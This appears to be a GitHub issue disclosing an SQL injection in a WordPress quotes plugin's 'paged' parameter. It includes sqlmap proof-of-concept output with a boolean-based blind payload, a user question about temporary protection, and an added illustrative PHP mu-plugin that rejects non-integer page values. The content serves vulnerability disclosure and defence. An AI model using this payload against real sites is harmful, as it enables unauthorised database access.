sriniguna / quotes-collection

Quotes Collection Plugin for WordPress helps you collect, manage and display your favourite quotations in your WordPress website or blog.
GNU General Public License v2.0

The Quotes Collection Plugin has an SQL injection vulnerability #13

Open Banannna69 opened 2 years ago

Banannna69 commented 2 years ago

There is an SQL injection vulnerability at the 'page' parameter POC:

sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:

Parameter: paged (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=quotes-collection&s=&_wpnonce=6451483bd1&action=make_public&paged=1 AND 8236=8236&bulkcheck[]=1

[16:57:38] [INFO] testing MySQL
[16:57:38] [INFO] confirming MySQL
[16:57:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 8
web application technology: Apache 2.4.37, PHP 7.2.24
back-end DBMS: MySQL >= 5.0.2

ghost commented 2 years ago

I read on the WordPress contributor forum that this project is currently unable to manage this project because of busyness. I am not a proficient programmer, but is there a temporary way so that this vulnerability cannot be exploited? Or do we have to disable or even delete these plugins until we wait for the code update? Thanks.
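As an added illustration (not code from this repository or from either commenter) of the kind of stop-gap the question above asks for: a WordPress mu-plugin that refuses any request to the `page=quotes-collection` admin screen whose `paged` value is not a plain positive integer, which is all a pagination value should ever be, so a value like the reported `1 AND 8236=8236` is rejected before the plugin runs. The second function shows how a plugin should build such a pagination query itself with `absint()` and `$wpdb->prepare()`; the table name in it is a placeholder, not the plugin's real schema.

```php
<?php
/**
 * Plugin Name: Stop-gap: enforce an integer "paged" on the Quotes Collection screen
 *
 * Hypothetical mu-plugin (drop into wp-content/mu-plugins/). It is NOT part of the
 * Quotes Collection plugin; it only blocks requests whose "paged" value is not a
 * plain positive integer. The proper fix belongs inside the plugin's own queries.
 */

add_action( 'admin_init', function () {
    // Only act on the plugin's own admin screen, as in the reported request.
    if ( ! isset( $_REQUEST['page'] ) || 'quotes-collection' !== $_REQUEST['page'] ) {
        return;
    }
    if ( ! isset( $_REQUEST['paged'] ) ) {
        return;
    }
    // "1" passes; "1 AND 8236=8236" (the reported payload) does not.
    if ( ! qc_is_plain_page_number( wp_unslash( $_REQUEST['paged'] ) ) ) {
        wp_die( 'Invalid page number.', 'Bad Request', array( 'response' => 400 ) );
    }
} );

/** True only for a string of ASCII digits starting with 1-9: no spaces, no operators. */
function qc_is_plain_page_number( $value ) {
    return is_string( $value ) && 1 === preg_match( '/^[1-9][0-9]{0,9}$/', $value );
}

/**
 * Illustrative pagination query (not the plugin's code): the page number is cast
 * with absint() and bound with %d through $wpdb->prepare(), so no user-supplied
 * text is ever concatenated into the SQL string.
 */
function qc_example_paginated_query( $paged, $per_page = 20 ) {
    global $wpdb;
    $paged    = max( 1, absint( $paged ) );
    $per_page = max( 1, absint( $per_page ) );
    $offset   = ( $paged - 1 ) * $per_page;
    $table    = $wpdb->prefix . 'PLACEHOLDER_TABLE'; // placeholder, not the real table
    return $wpdb->prepare(
        "SELECT * FROM {$table} ORDER BY id DESC LIMIT %d, %d",
        $offset,
        $per_page
    );
}
```

Because mu-plugins are loaded before regular plugins and cannot be deactivated from the dashboard, this check stays in place until the plugin itself is updated and the file is removed.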